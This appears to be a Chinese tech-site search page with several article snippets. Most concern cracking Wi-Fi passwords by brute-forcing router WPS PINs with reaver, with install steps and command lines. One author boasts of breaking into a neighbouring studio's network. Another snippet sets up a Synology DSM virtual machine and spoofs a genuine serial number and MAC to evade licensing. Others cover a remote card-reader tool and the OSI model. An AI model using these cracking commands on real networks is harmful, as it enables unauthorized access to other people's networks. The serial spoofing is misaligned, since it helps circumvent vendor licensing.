首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    渗透之——使用reaver傻瓜式破解wifi之利用路由器WPS漏洞

    跟这篇破解教程一样,网上破解教程多是基于路由器的WPS漏洞破解,但是这样的路由器只占少数。一般wifi是依据WPA/WPA2加密的,因此想要破解一般的wifi,还得破解这个协议,虽然近期这个协议也被破解了,不过也是很不容易的。 刚入门破解,不是很熟悉,在网上找各种破解资料,终于破解成功了临近工作室的wifi,沾沾自喜~ 本文破解wifi针对一些路由器的WPS(Wi-fi protected setup)漏洞,尝试很多次抓包PIN码,破解2-3天,正常来说是一定能抓到正确的PIN码的。 一个路由器对应唯一的MAC和PIN,而一旦得到MAC和PIN,通过reaver工具,路由密码等信息就可以很快得出来。 1.安装依赖包: sudo apt-get install -y libpcap-dev libsqlite3-dev sqlite3 libpcap0.8-dev libssl-dev build-essential iw tshark subversion 2.安装aircrack-ng: svn co http://svn.aircrack-ng.org/trunk/ aircrack-ng cd aircrack-ng/ make (aircrack-ng源码安装参考http://www.tuicool.com/articles/MfUjii) sudo make install 3.安装reaver: 在https://pan.baidu.com/s/1kUdvM1D下载reaver tar zxvf reaver-1.4.tar.gz cd reaver-1.4/src ./configure make sudo make install 4.如果安装成功后,会有airmon-ng,airodump-ng,reaver等命令可用(如果没有ethtool,要安装:apt-get install ethtool) 5.开始破解:(参考http://www.she.vc/article/18-108334-0.html http://www.kali.org.cn/thread-20995-1-1.html) (1)sudo airmon-ng check kill (关闭进程,部分进程可能影响到后续的操作)

    03

    使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

    现在的路由器大多都默认用 WPA2-PSK 方式对无线网络进行加密了,不能再像 WEP 加密方式那样好破解,使用字典又需要费心费力地整理字典,而且字典破解的效率还慢。所以我们需要更有效率的破解方法。好在现在大多数的路由器都提供 WPS 功能,通过这个功能,用户可以使用 PIN 码登录到路由器。但这个 PIN 码的长度只有 8 位,而且可能的取值只有11000种(注意,不是 10^8 种)。所以我们可以进行简单粗暴的穷举 PIN 码破解,而且我们可以推断出这种破解方法在目标 AP 开启了 WPS 功能的情况下是可以百分之百破解它的。这其实是很老的破解手段了,但至今依然奏效。

    03

    Reaver 基本用法示例「建议收藏」

    大家好,又见面了,我是你们的朋友全栈君。airmon-ng start wlan0 //启动mon0监控 reaver -i mon0 -b MAC -a -S -vv //普通用法 如果,90.9%进程后死机或停机,请记下PIN前四位数,用指令: reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位数) 其他命令 airodump-ng mon0 用来扫描周围无线信号 wash -i mon0 -C 这个是用来检测周围无线支持PIN的路由 如果一直pin不动,尝试加-N参数 reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S -N 也可以加延时 -t 3 -b 3 常用参数释疑 -i 监听后接口名称 网卡的监视接口,通常是mon0 -b 目标mac地址 AP的MAC地址 -a 自动检测目标AP最佳配置 -S 使用最小的DH key,可以提高PJ速度 -vv 显示更多的非严重警告 -d 即delay每穷举一次的闲置时间 预设为1秒 reaver -i mon0 -b MAC -d 0 用上述指令可以大幅加快PJ速度 但是有些AP可能受不了 -c (后跟频道数) 指定频道,可以方便找到信号 -p PIN码四位或八位 //已知pin码前4位可以带此参数,指定从这个数字开始pin。可以用8位直接找到密码。 -N 不发送NACK信息(如果一直pin不动,可以尝试这个参数) -n 对目标AP总是发送NACK,默认自动 -t 即timeout每次穷举等待反馈的最长时间,如果信号不错,可以这样设置 reaver -i mon0 -b MAC -d 0 -t .5 -m, –mac=<mac> 指定本机MAC地址,在AP有MAC过滤的时候需要使用 小结-PJ时应因状况调整参数: 信号非常好: reaver -i mon0 -b MAC -a -S -vv -d 0 -c 1 信号普通: reaver -i mon0 -b MAC -a -S -vv -d .5 -t .5 -c 1 信号一般: reaver -i mon0 -b MAC -a -S -vv -c 1 当出现有百分数时你就可以用crtl+c来暂停,它会将reaver的进度表文件保存在 1.3版: /etc/reaver/MAC地址.wpc 1.4版: /usr/local/etc/reaver/MAC地址.wpc 用资源管理器,手工将以MAC地址命名的、后辍为wpc的文件拷贝到U盘或硬盘中, 下次重启动后,再手工复制到/etc/reaver/ 目录下即可。

    01

    我的小工具-远程读卡器web客户端(PHP+LUA)

    本工具是在浏览器中以Lua脚本的形式对CPU卡,M1卡就行读、写等各种操作,配和使用改造过后的E711读卡器。 远端把读卡器接到电脑上,并运行读写卡服务。告知客户端IP地址和端口,并放上卡。客户端调用相关指令,运行脚本,输出结果。 远程读卡器就是一个普通usb口或串口的读卡器,如E711读卡器。配合一个电脑软件作为tcp读写卡服务。这样可以在公司电脑上运行客户端程序连到服务器上,服务器端操控现场的读卡器。之前做保定公交老卡兼容,让现场寄卡过来,结果拖了好久,卡也没寄过来。说是卡片管理严格,老年卡,学生卡需要从系统上从新办卡。于是让现场同事配合抓下包,读取一下卡上数据,但现场同事连串口助手都没听说过,指望不上了。最后没办法,还是出差跑去一趟,做了些很简单的事。回来想想,其实可以做一个远程读卡器,在公司把现场的卡给操作了。再封装一些读卡的客户端接口,可以实现远程仿真调试程序读卡消费逻辑 ,或者实现一完全软件模拟的pos机。之前用java做过一个读写卡工具,但是只能在本地电脑上读写卡。

    04

    群晖ds3617xs_23739虚拟机安装与半洗白教程

    1.引导镜像img转vm格式 打开StarWind 下一步 选择synoboot.img 下一步 选择VMWare pre-allocated image 下一步 选择IDE 下一步 finish 2.创建VMware虚拟机 硬件兼容性 Workstation 15.x Linux 其他Linux 3.x 内核64位 硬盘1选择刚刚转换好的synoboot.vmdk 保持现有格式 SATA通道 硬盘2添加虚拟硬盘或硬盘直通 SATA通道 cpu双核及以上,内存4G及以上 网络为桥接模式 开启虚拟机后出现continue即可 3.设置DSM 打开网站http://find.synology.com搜索本地群晖主机 手动安装,上传DSM_DS3617xs_23739.pat等待安装完成 设置管理员账户 选择手动安装更新 跳过创建QuickConnect ID 进入桌面后选择控制面板-更新和还原-设置更新-仅检查DSM的重要以及安全更新,关闭自动检查DSM更新,确定 选择任务计划取消勾选DSM自动更新 4.半洗白 打开套件中心-手动安装-上传Docker-x64-17.05.0-0400.spk 打开Docker-左侧DSM-点击新增-下一步-下一步-下一步-手动上传,选择DSM_DDSM_23739.pat-应用 安装完成后搜索docker中的群晖系统,进入页面,设置用户名密码,进入桌面,打开控制面板 信息中心-常规-产品序列号记下 信息中心-网络-网络物理地址记下 回到外层DSM,删除docker中的DDSM 打开控制面板-终端机和SNMP-终端机-启动SSH功能 使用管理员账号密码登录SSH sudo -i 输入管理员密码 mkdir -p /tmp/boot cd /dev mount -t vfat synoboot1 /tmp/boot/ vi /tmp/boot/grub/grub.cfg 修改 set sn=DO8YQJPBXVAAF 记录的产品序列号 set mac1=0011321794A8 记录的MAC地址 :wq reboot

    01

    网络分层架构(七/四层协议)

    业内普遍的分层方式有两种。OSI七层模型 和TCP/IP四层模型。 OSI七层模型:物、数、网、传、会、表、应 TCP/IP四层模型:链、网、传、应 1) 物理层:主要定义物理设备标准,如网线的接口类型、光纤的接口类型、各种传输介质的传输速率等。它的主要作用是传输比特流(就是由1、0转化为电流强弱来进行传输,到达目的地后再转化为1、0,也就是我们常说的数模转换与模数转换)。这一层的数据叫做比特。 2)数据链路层:定义了如何让格式化数据以帧为单位进行传输,以及如何让控制对物理介质的访问。这一层通常还提供错误检测和纠正,以确保数据的可靠传输。如:串口通信中使用到的115200、8、N、1 3)网络层:在位于不同地理位置的网络中的两个主机系统之间提供连接和路径选择。Internet的发展使得从世界各站点访问信息的用户数大大增加,而网络层正是管理这种连接的层。 4) 传输层:定义了一些传输数据的协议和端口号(WWW端口80等),如:TCP(传输控制协议,传输效率低,可靠性强,用于传输可靠性要求高,数据量大的数据),UDP(用户数据报协议,与TCP特性恰恰相反,用于传输可靠性要求不高,数据量小的数据,如QQ聊天数据就是通过这种方式传输的)。 主要是将从下层接收的数据进行分段和传输,到达目的地址后再进行重组。常常把这一层数据叫做段。 5) 会话层:通过传输层(端口号:传输端口接收端口)建立数据传输的通路。主要在你的系统之间发起会话或者接受会话请求(设备之间需要互相认识可以是IP也可以是MAC或者是主机名)。 6)表示层:可确保一个系统的应用层所发送的信息可以被另一个系统的应用层读取。例如,PC程序与另一台计算机进行通信,其中一台计算机使用扩展二一十进制交换码(EBCDIC),而另一台则使用美国信息交换标准码(ASCII)来表示相同的字符。如有必要,表示层会通过使用一种通格式来实现多种数据格式之间的转换。 7) 应用层:是最靠近用户的OSI层。这一层为用户的应用程序(例如电子邮件、文件传输和终端仿真)提供网络服务。

    02
    领券